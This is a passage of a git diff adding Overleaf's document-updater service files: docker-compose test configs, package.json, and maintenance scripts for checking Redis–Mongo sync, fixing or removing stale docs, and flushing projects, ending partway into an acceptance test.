process.env.PUBLISH_ON_INDIVIDUAL_CHANNELS === 'true', + + continuousBackgroundFlush: process.env.CONTINUOUS_BACKGROUND_FLUSH === 'true', + + smoothingOffset: process.env.SMOOTHING_OFFSET || 1000, // milliseconds + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '10', 10) * 1000, +} diff --git a/services/document-updater/docker-compose.ci.yml b/services/document-updater/docker-compose.ci.yml new file mode 100644 index 0000000..6deaad4 --- /dev/null +++ b/services/document-updater/docker-compose.ci.yml @@ -0,0 +1,65 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . 
+ image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/document-updater/docker-compose.yml b/services/document-updater/docker-compose.yml new file mode 100644 index 0000000..e33174f --- /dev/null +++ b/services/document-updater/docker-compose.yml @@ -0,0 +1,69 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/document-updater + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/document-updater + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/document-updater + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/document-updater + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + diff --git a/services/document-updater/package.json b/services/document-updater/package.json new file mode 100644 index 0000000..4fb45d6 --- /dev/null +++ b/services/document-updater/package.json @@ -0,0 +1,51 @@ +{ + "name": "@overleaf/document-updater", + "description": "An API for applying incoming updates to documents in real-time", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "benchmark:apply": "node benchmarks/apply", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/ranges-tracker": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@types/chai-as-promised": "^7.1.8", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "express": "^4.21.2", + "lodash": "^4.17.21", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2", + "requestretry": "^7.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cluster-key-slot": "^1.0.5", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "^2.0.0", + "typescript": "^5.0.4" + } +} diff --git a/services/document-updater/scripts/check_redis_mongo_sync_state.js b/services/document-updater/scripts/check_redis_mongo_sync_state.js new file mode 100644 index 0000000..0820940 --- /dev/null +++ b/services/document-updater/scripts/check_redis_mongo_sync_state.js @@ -0,0 +1,425 @@ +const fs = require('node:fs') +const Path = require('node:path') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Errors = require('../app/js/Errors') +const LockManager = require('../app/js/LockManager') +const PersistenceManager = require('../app/js/PersistenceManager') +const ProjectFlusher = require('../app/js/ProjectFlusher') +const ProjectManager = require('../app/js/ProjectManager') +const RedisManager = require('../app/js/RedisManager') +const Settings = require('@overleaf/settings') +const request = require('requestretry').defaults({ + maxAttempts: 2, + retryDelay: 10, +}) + +const AUTO_FIX_VERSION_MISMATCH = + process.env.AUTO_FIX_VERSION_MISMATCH === 'true' +const AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA = + process.env.AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA === 'true' +const SCRIPT_LOG_LEVEL = process.env.SCRIPT_LOG_LEVEL || 'warn' +const FLUSH_IN_SYNC_PROJECTS = process.env.FLUSH_IN_SYNC_PROJECTS === 'true' +const FOLDER = + process.env.FOLDER || '/tmp/overleaf-check-redis-mongo-sync-state' +const LIMIT = parseInt(process.env.LIMIT || '1000', 10) +const RETRIES = parseInt(process.env.RETRIES || '5', 10) +const WRITE_CONTENT = process.env.WRITE_CONTENT === 'true' + +process.env.LOG_LEVEL = SCRIPT_LOG_LEVEL 
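+// LOG_LEVEL is assigned before the logger is initialized below (presumably
+// picked up at initialization), so the script runs at the quieter
+// SCRIPT_LOG_LEVEL default ('warn') and reports progress via console.log.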
+logger.initialize('check-redis-mongo-sync-state') + +const COMPARE_AND_SET = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("set", KEYS[1], ARGV[2]) else return 0 end' + +/** + * @typedef {Object} Doc + * @property {number} version + * @property {Array<string>} lines + * @property {string} pathname + * @property {Object} ranges + * @property {boolean} [partiallyDeleted] + */ + +class TryAgainError extends Error {} + +/** + * @param {string} docId + * @param {Doc} redisDoc + * @param {Doc} mongoDoc + * @return {Promise<void>} + */ +async function updateDocVersionInRedis(docId, redisDoc, mongoDoc) { + const lockValue = await LockManager.promises.getLock(docId) + try { + const key = Settings.redis.documentupdater.key_schema.docVersion({ + doc_id: docId, + }) + const numberOfKeys = 1 + const ok = await RedisManager.rclient.eval( + COMPARE_AND_SET, + numberOfKeys, + key, + redisDoc.version, + mongoDoc.version + ) + if (!ok) { + throw new TryAgainError( + 'document has been updated, aborting overwrite. Try again.' + ) + } + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + } +} + +async function fixPartiallyDeletedDocMetadata(projectId, docId, pathname) { + await new Promise((resolve, reject) => { + request( + { + method: 'PATCH', + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016/project/${projectId}/doc/${docId}`, + timeout: 60 * 1000, + json: { + name: Path.basename(pathname), + deleted: true, + deletedAt: new Date(), + }, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 204) { + return reject( + new OError('patch request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve() + } + ) + }) +} + +async function getDocFromMongo(projectId, docId) { + try { + return await PersistenceManager.promises.getDoc(projectId, docId) + } catch (err) { + if (!(err instanceof Errors.NotFoundError)) { + throw err + } + } + const docstoreDoc = await new Promise((resolve, reject) => { + request( + { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016/project/${projectId}/doc/${docId}/peek`, + timeout: 60 * 1000, + json: true, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 200) { + return reject( + new OError('fallback request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve(body) + } + ) + }) + const deletedDocName = await new Promise((resolve, reject) => { + request( + { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016/project/${projectId}/doc-deleted`, + timeout: 60 * 1000, + json: true, + }, + (err, res, body) => { + if (err) return reject(err) + const { statusCode } = res + if (statusCode !== 200) { + return reject( + new OError('list deleted docs request to docstore failed', { + statusCode, + body, + }) + ) + } + resolve(body.find(doc => doc._id === docId)?.name) + } + ) + }) + if (docstoreDoc.deleted && deletedDocName) { + return { + ...docstoreDoc, + pathname: deletedDocName, + } + } + return { + ...docstoreDoc, + pathname: `/partially-deleted-doc-with-unknown-name-and-id-${docId}.txt`, + partiallyDeleted: true, + } +} + +/** + * @param {string} projectId + * @param {string} docId + * @return {Promise<boolean>} + */ +async function processDoc(projectId, docId) { + const redisDoc = /** @type Doc */ await RedisManager.promises.getDoc( + projectId, + docId + ) + const mongoDoc = /** @type Doc */ await getDocFromMongo(projectId, docId) + + if (mongoDoc.partiallyDeleted) { + 
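+    // "Partially deleted" (set in getDocFromMongo above) means the doc could
+    // only be peeked from docstore and is not fully recorded as deleted there:
+    // the content survives, but the deletion metadata (name, deleted,
+    // deletedAt) is incomplete. fixPartiallyDeletedDocMetadata() patches the
+    // missing metadata back into docstore.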
if (AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA) { + console.log( + `Found partially deleted doc ${docId} in project ${projectId}: fixing metadata` + ) + await fixPartiallyDeletedDocMetadata(projectId, docId, redisDoc.pathname) + } else { + console.log( + `Found partially deleted doc ${docId} in project ${projectId}: use AUTO_FIX_PARTIALLY_DELETED_DOC_METADATA=true to fix metadata` + ) + } + } + + if (mongoDoc.version < redisDoc.version) { + // mongo is behind, we can flush to mongo when all docs are processed. + return false + } + + mongoDoc.snapshot = mongoDoc.lines.join('\n') + redisDoc.snapshot = redisDoc.lines.join('\n') + if (!mongoDoc.ranges) mongoDoc.ranges = {} + if (!redisDoc.ranges) redisDoc.ranges = {} + + const sameLines = mongoDoc.snapshot === redisDoc.snapshot + const sameRanges = _.isEqual(mongoDoc.ranges, redisDoc.ranges) + if (sameLines && sameRanges) { + if (mongoDoc.version > redisDoc.version) { + // mongo is ahead, technically out of sync, but practically the content is identical + if (AUTO_FIX_VERSION_MISMATCH) { + console.log( + `Fixing out of sync doc version for doc ${docId} in project ${projectId}: mongo=${mongoDoc.version} > redis=${redisDoc.version}` + ) + await updateDocVersionInRedis(docId, redisDoc, mongoDoc) + return false + } else { + console.error( + `Detected out of sync redis and mongo version for doc ${docId} in project ${projectId}, auto-fixable via AUTO_FIX_VERSION_MISMATCH=true` + ) + return true + } + } else { + // same lines, same ranges, same version + return false + } + } + + const dir = Path.join(FOLDER, projectId, docId) + console.error( + `Detected out of sync redis and mongo content for doc ${docId} in project ${projectId}` + ) + if (!WRITE_CONTENT) return true + + console.log(`pathname: ${mongoDoc.pathname}`) + if (mongoDoc.pathname !== redisDoc.pathname) { + console.log(`pathname redis: ${redisDoc.pathname}`) + } + console.log(`mongo version: ${mongoDoc.version}`) + console.log(`redis version: ${redisDoc.version}`) + + await fs.promises.mkdir(dir, { recursive: true }) + + if (sameLines) { + console.log('mongo lines match redis lines') + } else { + console.log( + `mongo lines and redis lines out of sync, writing content into ${dir}` + ) + await fs.promises.writeFile( + Path.join(dir, 'mongo-snapshot.txt'), + mongoDoc.snapshot + ) + await fs.promises.writeFile( + Path.join(dir, 'redis-snapshot.txt'), + redisDoc.snapshot + ) + } + if (sameRanges) { + console.log('mongo ranges match redis ranges') + } else { + console.log( + `mongo ranges and redis ranges out of sync, writing content into ${dir}` + ) + await fs.promises.writeFile( + Path.join(dir, 'mongo-ranges.json'), + JSON.stringify(mongoDoc.ranges) + ) + await fs.promises.writeFile( + Path.join(dir, 'redis-ranges.json'), + JSON.stringify(redisDoc.ranges) + ) + } + console.log('---') + return true +} + +/** + * @param {string} projectId + * @return {Promise<number>} + */ +async function processProject(projectId) { + const docIds = await RedisManager.promises.getDocIdsInProject(projectId) + + let outOfSync = 0 + for (const docId of docIds) { + let lastErr + for (let i = 0; i <= RETRIES; i++) { + try { + if (await processDoc(projectId, docId)) { + outOfSync++ + } + break + } catch (err) { + lastErr = err + } + } + if (lastErr) { + throw OError.tag(lastErr, 'process doc', { docId }) + } + } + if (outOfSync === 0 && FLUSH_IN_SYNC_PROJECTS) { + try { + await ProjectManager.promises.flushAndDeleteProjectWithLocks( + projectId, + {} + ) + } catch (err) { + throw OError.tag(err, 'flush project with only 
in-sync docs') + } + } + return outOfSync +} + +/** + * @param {Set<string>} processed + * @param {Set<string>} outOfSync + * @return {Promise<{perIterationOutOfSync: number, done: boolean}>} + */ +async function scanOnce(processed, outOfSync) { + const projectIds = await ProjectFlusher.promises.flushAllProjects({ + limit: LIMIT, + dryRun: true, + }) + + let perIterationOutOfSync = 0 + for (const projectId of projectIds) { + if (processed.has(projectId)) continue + processed.add(projectId) + + let perProjectOutOfSync = 0 + try { + perProjectOutOfSync = await processProject(projectId) + } catch (err) { + throw OError.tag(err, 'process project', { projectId }) + } + perIterationOutOfSync += perProjectOutOfSync + if (perProjectOutOfSync > 0) { + outOfSync.add(projectId) + } + } + + return { perIterationOutOfSync, done: projectIds.length < LIMIT } +} + +/** + * @return {Promise<number>} + */ +async function main() { + if (!WRITE_CONTENT) { + console.warn() + console.warn( + ` Use WRITE_CONTENT=true to write the content of out of sync docs to FOLDER=${FOLDER}` + ) + console.warn() + } else { + console.log( + `Writing content for projects with out of sync docs into FOLDER=${FOLDER}` + ) + await fs.promises.mkdir(FOLDER, { recursive: true }) + const existing = await fs.promises.readdir(FOLDER) + if (existing.length > 0) { + console.warn() + console.warn( + ` Found existing entries in FOLDER=${FOLDER}. Please delete or move these before running the script again.` + ) + console.warn() + return 101 + } + } + if (LIMIT < 100) { + console.warn() + console.warn( + ` Using small LIMIT=${LIMIT}, this can take a while to SCAN in a large redis database.` + ) + console.warn() + } + + const processed = new Set() + const outOfSyncProjects = new Set() + let totalOutOfSyncDocs = 0 + while (true) { + const before = processed.size + const { perIterationOutOfSync, done } = await scanOnce( + processed, + outOfSyncProjects + ) + totalOutOfSyncDocs += perIterationOutOfSync + console.log(`Processed ${processed.size} projects`) + console.log( + `Found ${ + outOfSyncProjects.size + } projects with ${totalOutOfSyncDocs} out of sync docs: ${JSON.stringify( + Array.from(outOfSyncProjects) + )}` + ) + if (done) { + console.log('Finished iterating all projects in redis') + break + } + if (processed.size === before) { + console.error( + `Found too many un-flushed projects (LIMIT=${LIMIT}). Please fix the reported projects first, then try again.` + ) + if (!FLUSH_IN_SYNC_PROJECTS) { + console.error( + 'Use FLUSH_IN_SYNC_PROJECTS=true to flush projects that have been checked.' + ) + } + return 2 + } + } + return totalOutOfSyncDocs > 0 ? 
1 : 0 +} + +main() + .then(code => { + process.exit(code) + }) + .catch(error => { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + process.exit(1) + }) diff --git a/services/document-updater/scripts/expire_docops.js b/services/document-updater/scripts/expire_docops.js new file mode 100644 index 0000000..463509e --- /dev/null +++ b/services/document-updater/scripts/expire_docops.js @@ -0,0 +1,65 @@ +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +let keys = Settings.redis.documentupdater.key_schema +const async = require('async') +const RedisManager = require('../app/js/RedisManager') + +const getKeysFromNode = function (node, pattern, callback) { + let cursor = 0 // redis iterator + const keySet = {} // use hash to avoid duplicate results + // scan over all keys looking for pattern + const doIteration = () => + node.scan(cursor, 'MATCH', pattern, 'COUNT', 1000, function (error, reply) { + if (error) { + return callback(error) + } + ;[cursor, keys] = reply + console.log('SCAN', keys.length) + for (const key of keys) { + keySet[key] = true + } + if (cursor === '0') { + // note redis returns string result not numeric + return callback(null, Object.keys(keySet)) + } else { + return doIteration() + } + }) + return doIteration() +} + +const getKeys = function (pattern, callback) { + const nodes = (typeof rclient.nodes === 'function' + ? rclient.nodes('master') + : undefined) || [rclient] + console.log('GOT NODES', nodes.length) + const doKeyLookupForNode = (node, cb) => getKeysFromNode(node, pattern, cb) + return async.concatSeries(nodes, doKeyLookupForNode, callback) +} + +const expireDocOps = callback => + getKeys(keys.docOps({ doc_id: '*' }), (error, keys) => { + if (error) return callback(error) + async.mapSeries( + keys, + function (key, cb) { + console.log(`EXPIRE ${key} ${RedisManager.DOC_OPS_TTL}`) + return rclient.expire(key, RedisManager.DOC_OPS_TTL, cb) + }, + callback + ) + }) + +setTimeout( + () => + // Give redis a chance to connect + expireDocOps(function (error) { + if (error) { + throw error + } + return process.exit() + }), + 1000 +) diff --git a/services/document-updater/scripts/fix_docs_with_empty_pathnames.js b/services/document-updater/scripts/fix_docs_with_empty_pathnames.js new file mode 100644 index 0000000..e3e0341 --- /dev/null +++ b/services/document-updater/scripts/fix_docs_with_empty_pathnames.js @@ -0,0 +1,79 @@ +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const ProjectFlusher = require('app/js/ProjectFlusher') +const DocumentManager = require('app/js/DocumentManager') +const util = require('node:util') +const flushAndDeleteDocWithLock = util.promisify( + DocumentManager.flushAndDeleteDocWithLock +) + +async function flushAndDeleteDocs(dockeys, options) { + const docIds = ProjectFlusher._extractIds(dockeys) + for (const docId of docIds) { + const pathname = await rclient.get(keys.pathname({ doc_id: docId })) + if (!pathname) { + const projectId = await rclient.get(keys.projectKey({ doc_id: docId })) + if (!projectId) { + // await deleteDanglingDoc(projectId, docId, pathname, options) + logger.info( + { projectId, docId, pathname }, + 'skipping doc with empty pathname and project id' + ) + } else { + await 
flushAndDeleteDoc(projectId, docId, pathname, options)
+      }
+    }
+  }
+}
+
+async function flushAndDeleteDoc(projectId, docId, pathname, options) {
+  if (options.dryRun) {
+    logger.info(
+      { projectId, docId, pathname },
+      'dry run mode - would flush doc with empty pathname'
+    )
+    return
+  }
+  logger.info(
+    { projectId, docId, pathname },
+    'flushing doc with empty pathname'
+  )
+  try {
+    await flushAndDeleteDocWithLock(projectId, docId, {})
+  } catch (err) {
+    logger.error(
+      { projectId, docId, pathname, err },
+      'error flushing and deleting doc without pathname'
+    )
+  }
+}
+
+async function cleanUpDocs(options) {
+  logger.info({ options }, 'cleaning up docs without pathnames')
+  let cursor = 0
+  do {
+    const [newCursor, doclinesKeys] = await rclient.scan(
+      cursor,
+      'MATCH',
+      keys.docLines({ doc_id: '*' }),
+      'COUNT',
+      options.limit
+    )
+    await flushAndDeleteDocs(doclinesKeys, options)
+    cursor = newCursor
+  } while (cursor !== '0')
+}
+
+cleanUpDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' })
+  .then(result => {
+    rclient.quit()
+    console.log('DONE')
+  })
+  .catch(function (error) {
+    console.error(error)
+    process.exit(1)
+  })
diff --git a/services/document-updater/scripts/fix_docs_with_missing_project.js b/services/document-updater/scripts/fix_docs_with_missing_project.js
new file mode 100644
index 0000000..d302212
--- /dev/null
+++ b/services/document-updater/scripts/fix_docs_with_missing_project.js
@@ -0,0 +1,87 @@
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+const rclient = require('@overleaf/redis-wrapper').createClient(
+  Settings.redis.documentupdater
+)
+const keys = Settings.redis.documentupdater.key_schema
+const ProjectFlusher = require('../app/js/ProjectFlusher')
+const DocumentManager = require('../app/js/DocumentManager')
+const { mongoClient, db, ObjectId } = require('../app/js/mongodb')
+const util = require('node:util')
+const flushAndDeleteDocWithLock = util.promisify(
+  DocumentManager.flushAndDeleteDocWithLock
+)
+
+async function fixDocsWithMissingProjectIds(dockeys, options) {
+  const docIds = ProjectFlusher._extractIds(dockeys)
+  for (const docId of docIds) {
+    const projectId = await rclient.get(keys.projectKey({ doc_id: docId }))
+    logger.debug({ docId, projectId }, 'checking doc')
+    if (!projectId) {
+      try {
+        await insertMissingProjectId(docId, options)
+      } catch (err) {
+        logger.error({ docId, err }, 'error fixing doc without project id')
+      }
+    }
+  }
+}
+
+async function insertMissingProjectId(docId, options) {
+  const doc = await db.docs.findOne({ _id: ObjectId(docId) })
+  if (!doc) {
+    logger.warn({ docId }, 'doc not found in mongo')
+    return
+  }
+  if (!doc.project_id) {
+    logger.error({ docId }, 'doc does not have project id in mongo')
+    return
+  }
+  logger.debug({ docId, doc }, 'found doc')
+  const projectIdFromMongo = doc.project_id.toString()
+  if (options.dryRun) {
+    logger.info(
+      { projectIdFromMongo, docId },
+      'dry run mode - would insert project id in redis'
+    )
+    return
+  }
+  // set the project id for this doc
+  await rclient.set(keys.projectKey({ doc_id: docId }), projectIdFromMongo)
+  logger.debug({ docId, projectIdFromMongo }, 'inserted project id in redis')
+  if (projectIdFromMongo) {
+    await flushAndDeleteDocWithLock(projectIdFromMongo, docId, {})
+    logger.info(
+      { docId, projectIdFromMongo },
+      'fixed doc with empty project id'
+    )
+  }
+  return projectIdFromMongo
+}
+
+async function findAndProcessDocs(options) {
+  logger.info({ options }, 'fixing docs with missing project id')
+  let cursor = 0
+  do {
+    const [newCursor, doclinesKeys] = await rclient.scan(
+      cursor,
+      'MATCH',
+      keys.docLines({ doc_id: '*' }),
+      'COUNT',
+      options.limit
+    )
+    await fixDocsWithMissingProjectIds(doclinesKeys, options)
+    cursor = newCursor
+  } while (cursor !== '0')
+}
+
+findAndProcessDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' })
+  .then(result => {
+    rclient.quit()
+    mongoClient.close()
+    console.log('DONE')
+  })
+  .catch(function (error) {
+    console.error(error)
+    process.exit(1)
+  })
diff --git a/services/document-updater/scripts/flush_all.js b/services/document-updater/scripts/flush_all.js
new file mode 100644
index 0000000..68bd831
--- /dev/null
+++ b/services/document-updater/scripts/flush_all.js
@@ -0,0 +1,54 @@
+const ProjectFlusher = require('../app/js/ProjectFlusher')
+const minimist = require('minimist')
+
+async function main() {
+  const argv = minimist(process.argv.slice(2), {
+    default: {
+      limit: 100000,
+      concurrency: 5,
+      'dry-run': false,
+    },
+    boolean: ['dry-run', 'help'],
+    alias: { h: 'help', n: 'dry-run', j: 'concurrency' },
+  })
+
+  if (argv.help) {
+    console.log(`
+Usage: node scripts/flush_all.js [options]
+
+Options:
+  --limit             Number of projects to flush (default: 100000)
+  --concurrency, -j   Number of concurrent flush operations (default: 5)
+  --dry-run, -n       Perform a dry run without making any changes (default: false)
+  --help, -h          Show this help message
+  `)
+    process.exit(0)
+  }
+
+  const options = {
+    limit: argv.limit,
+    concurrency: argv.concurrency,
+    dryRun: argv['dry-run'],
+  }
+  console.log('Flushing all projects with options:', options)
+
+  return await new Promise((resolve, reject) => {
+    ProjectFlusher.flushAllProjects(options, err => {
+      if (err) {
+        reject(err)
+      } else {
+        resolve()
+      }
+    })
+  })
+}
+
+main()
+  .then(() => {
+    console.log('Done flushing all projects')
+    process.exit(0)
+  })
+  .catch(error => {
+    console.error('There was an error flushing all projects', { error })
+    process.exit(1)
+  })
diff --git a/services/document-updater/scripts/remove_deleted_docs.js b/services/document-updater/scripts/remove_deleted_docs.js
new file mode 100644
index 0000000..a698071
--- /dev/null
+++ b/services/document-updater/scripts/remove_deleted_docs.js
@@ -0,0 +1,161 @@
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+const rclient = require('@overleaf/redis-wrapper').createClient(
+  Settings.redis.documentupdater
+)
+const keys = Settings.redis.documentupdater.key_schema
+const ProjectFlusher = require('../app/js/ProjectFlusher')
+const RedisManager = require('../app/js/RedisManager')
+const { mongoClient, db, ObjectId } = require('../app/js/mongodb')
+const util = require('node:util')
+const getDoc = util.promisify((projectId, docId, cb) =>
+  RedisManager.getDoc(projectId, docId, (err, ...args) => cb(err, args))
+)
+const removeDocFromMemory = util.promisify(RedisManager.removeDocFromMemory)
+
+const summary = { totalDocs: 0, deletedDocs: 0, skippedDocs: 0 }
+
+async function removeDeletedDocs(dockeys, options) {
+  const docIds = ProjectFlusher._extractIds(dockeys)
+  for (const docId of docIds) {
+    summary.totalDocs++
+    const docCount = await db.docs.find({ _id: new ObjectId(docId) }).count()
+    if (!docCount) {
+      try {
+        await removeDeletedDoc(docId, options)
+      } catch (err) {
+        logger.error({ docId, err }, 'error removing deleted doc')
+      }
+    }
+  }
+}
+
+async function removeDeletedDoc(docId, options) {
+  const projectId = await rclient.get(keys.projectKey({ doc_id: docId }))
+
+  
const [ + docLines, + version, + ranges, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + ] = await getDoc(projectId, docId) + + const project = await db.projects.findOne({ _id: new ObjectId(projectId) }) + + let status + + if (project) { + const projectJSON = JSON.stringify(project.rootFolder) + const containsDoc = projectJSON.indexOf(docId) !== -1 + if (containsDoc) { + logger.warn( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + }, + 'refusing to delete doc, project contains docId' + ) + summary.skippedDocs++ + return + } else { + logger.warn( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + }, + 'refusing to delete doc, project still exists' + ) + summary.skippedDocs++ + return + } + } else { + status = 'projectDeleted' + } + summary.deletedDocs++ + if (options.dryRun) { + logger.info( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + status, + summary, + }, + 'dry run mode - would remove doc from redis' + ) + return + } + removeDocFromMemory(projectId, docId) + logger.info( + { + projectId, + docId, + docLinesBytes: docLines && docLines.length, + version, + rangesBytes: ranges && ranges.length, + pathname, + projectHistoryId, + unflushedTime, + lastUpdatedAt, + lastUpdatedBy, + status, + summary, + }, + 'removed doc from redis' + ) +} + +async function findAndProcessDocs(options) { + logger.info({ options }, 'removing deleted docs') + let cursor = 0 + do { + const [newCursor, doclinesKeys] = await rclient.scan( + cursor, + 'MATCH', + keys.docLines({ doc_id: '*' }), + 'COUNT', + options.limit + ) + await removeDeletedDocs(doclinesKeys, options) + cursor = newCursor + } while (cursor !== '0') +} + +findAndProcessDocs({ limit: 1000, dryRun: process.env.DRY_RUN !== 'false' }) + .then(result => { + rclient.quit() + mongoClient.close() + console.log('DONE') + process.exit(0) + }) + .catch(function (error) { + console.error(error) + process.exit(1) + }) diff --git a/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js b/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js new file mode 100644 index 0000000..73e22aa --- /dev/null +++ b/services/document-updater/test/acceptance/js/ApplyingUpdatesToADocTests.js @@ -0,0 +1,723 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') +const Settings = require('@overleaf/settings') +const rclientProjectHistory = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const rclientDU = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const Keys = Settings.redis.documentupdater.key_schema +const ProjectHistoryKeys = Settings.redis.project_history.key_schema + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Applying updates to a doc', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.op = { + i: 'one 
